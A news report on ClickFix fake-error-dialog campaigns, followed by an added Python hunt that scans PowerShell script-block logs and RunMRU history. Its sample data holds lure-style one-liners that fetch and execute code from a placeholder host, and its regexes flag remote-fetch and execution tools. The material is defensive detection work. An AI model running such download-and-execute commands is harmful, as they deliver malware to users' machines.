2024-11-18

Threat actors are ramping up their use of ‘ClickFix’ social engineering attacks, a tactic that is likely proving highly effective for malware deployment. A new analysis by Proofpoint highlighted numerous campaigns by multiple threat actors using this tactic since March 2024, including a suspected Russian espionage group that used it to target Ukrainian organizations. Various malware families have been deployed using ClickFix, including AsyncRAT, Danabot, DarkGate, Lumma Stealer and NetSupport.

Number of observed ClickFix campaigns from March to October 2024. Source: Proofpoint

“The ClickFix technique is growing in popularity and is being used by many financially motivated threat actors, as well as reportedly by suspected espionage-focused groups. Given the widespread adoption, it is likely this technique is very effective,” the researchers wrote.

ClickFix Attacks Explained

ClickFix is a social engineering technique that uses dialog boxes containing fake error messages to lure people into copying, pasting and running malicious content on their own computer. It is effective at bypassing security controls because the user infects themselves: the malicious command arrives as text the victim pastes, not as an attachment or download that security tools could scan. The tactic preys on users’ desire to fix problems themselves rather than alert their IT team or anyone else. The dialog boxes can originate from a range of sources, including compromised websites, documents, HTML attachments and malicious URLs. Threat actors have been observed impersonating various software and services with the ClickFix technique, including common enterprise software such as Microsoft Word and Google Chrome. The dialog box contains instructions that purport to “fix” the problem but in fact lead to one of two outcomes:

The malicious script is copied to the clipboard automatically and the user pastes it into the PowerShell terminal or the Windows Run dialog (Win+R), eventually running a malicious script via PowerShell, or

The user manually opens PowerShell and copies and pastes the provided command

Example of early ClickFix technique used by a fake update website compromise threat cluster known as ClearFake. Source: Proofpoint
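Both paste paths above leave traces a defender can hunt for: PowerShell Script Block Logging (Event ID 4104) records the text of anything run in a PowerShell window, and the per-user RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) records what was typed into the Run dialog. The following Python hunt is an added example, not code from the article or from Proofpoint: the script-block lines and RunMRU values are constructed here, the indicator names and regexes are illustrative assumptions rather than Proofpoint's detection logic, and the hostnames are placeholders.

```python
"""Hunt for ClickFix-style paste-and-run commands in constructed Windows telemetry.

Added example, not from the article or Proofpoint. Inputs mimic two real
sources: PowerShell Script Block Logging (Event ID 4104) script text and
the RunMRU registry values behind the Win+R Run dialog.
"""
import re

# One regex per trait of a one-liner written to be pasted and run blindly.
# Indicator names and patterns are this example's own assumptions.
INDICATORS = {
    "hidden_window": re.compile(r"-(?:w|windowstyle)\s+hidden", re.I),
    "policy_bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I),
    "remote_fetch": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile)\b",
        re.I,
    ),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "encoded_command": re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    "mshta_launch": re.compile(r"\bmshta(?:\.exe)?\b", re.I),
    "remote_url": re.compile(r"\b(?:https?|ftp)://\S+", re.I),
}


def scan_command(cmd):
    """Return the sorted names of every indicator that matches `cmd`."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmd))


def is_clickfix_like(cmd, threshold=2):
    """One trait alone (a URL, a hidden window) is common in admin work;
    two or more together are the shape of a command meant to be pasted blind."""
    return len(scan_command(cmd)) >= threshold


def runmru_commands(values):
    """Return Run-dialog history, most recent first, from RunMRU values.

    Windows stores each entry under a single-letter value name with a
    trailing "\\1" and lists the order in the MRUList string, most recent
    letter first (layout as seen in regedit; the dict stands in for the key).
    """
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def hunt(script_blocks, runmru_values, threshold=2):
    """Return (source, command, indicators) for every command at or above threshold.

    Run-dialog lures (e.g. an mshta launch) never produce a 4104 event unless
    they start PowerShell, which is why RunMRU is checked as a second source.
    """
    hits = []
    for cmd in script_blocks:
        found = scan_command(cmd)
        if len(found) >= threshold:
            hits.append(("4104", cmd, found))
    for cmd in runmru_commands(runmru_values):
        found = scan_command(cmd)
        if len(found) >= threshold:
            hits.append(("RunMRU", cmd, found))
    return hits


# Constructed sample data (not real telemetry); example.invalid is a placeholder.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users | Measure-Object",                 # benign admin activity
    "Get-Service | Where-Object Status -eq 'Running'",          # benign admin activity
    # lure-style one-liner: hidden window, policy bypass, fetch-and-eval
    'powershell -w hidden -ep bypass -c "iex (irm http://example.invalid/fix.ps1)"',
    # lure-style one-liner carrying an encoded payload
    "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand "
    "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
]
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "cmd\\1",
    "c": "mshta http://example.invalid/verify.hta\\1",   # typed into Win+R by the victim
}

if __name__ == "__main__":
    for source, cmd, found in hunt(SAMPLE_SCRIPT_BLOCKS, SAMPLE_RUNMRU):
        print(f"[{source}] {', '.join(found)}\n    {cmd}")
```

Script Block Logging is off by default and has to be enabled by policy before 4104 events exist to search, and a legitimate installer one-liner of the fetch-and-`iex` shape trips the same indicators, so a real deployment needs an allowlist of known-good download sources; the point of the two-source hunt is that the Run-dialog path, which the lure steers users toward precisely because it is quiet, still leaves a record in RunMRU.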